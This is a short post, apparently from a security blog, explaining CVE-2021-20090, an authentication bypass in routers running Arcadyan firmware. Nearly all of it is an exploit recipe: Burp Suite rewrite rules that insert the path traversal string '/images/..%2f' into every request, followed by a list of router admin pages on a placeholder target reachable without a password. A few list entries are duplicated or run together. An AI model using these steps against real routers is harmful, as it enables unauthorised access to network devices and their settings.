CVE-2021-20090 Arcadyan Routers Authentication Bypass Vulnerability
Introduction
Path traversal vulnerability in the web interface of routers with Arcadyan firmware (Buffalo, etc.) can be exploited to bypass authentication.
Exploit
1. Open Burp Suite and go to Proxy > Options tab and add Match and Replace rule to remove path traversal string from Referer in request header.
Match /images/..%2f and replace it with /
2. Add another Match and Replace rule to prefix all URLs with images/..%2f.
Match GET / and replace it with GET /images/..%2f
3. Now browse the router web interface pages through Burp Suite proxy browser. All the request URLs will be automatically modified by the proxy.
Some of the URLs which can be accessed without authentication:
http://targetip
http://targetip/info.htmlhttp://targetip
http://targetip/log_log.html
http://targetip/lan_bridge.html
http://targetip/save_init.html
http://targetip/wireless_band2g.html
http://targetip/ap_password_access_date_ntp.html
http://targetip/lan_bridge.html
http://targetip/save_init.html
http://targetip/wireless_band2g.html
http://targetip/ap_password_access_date_ntp.html
Comments
Post a Comment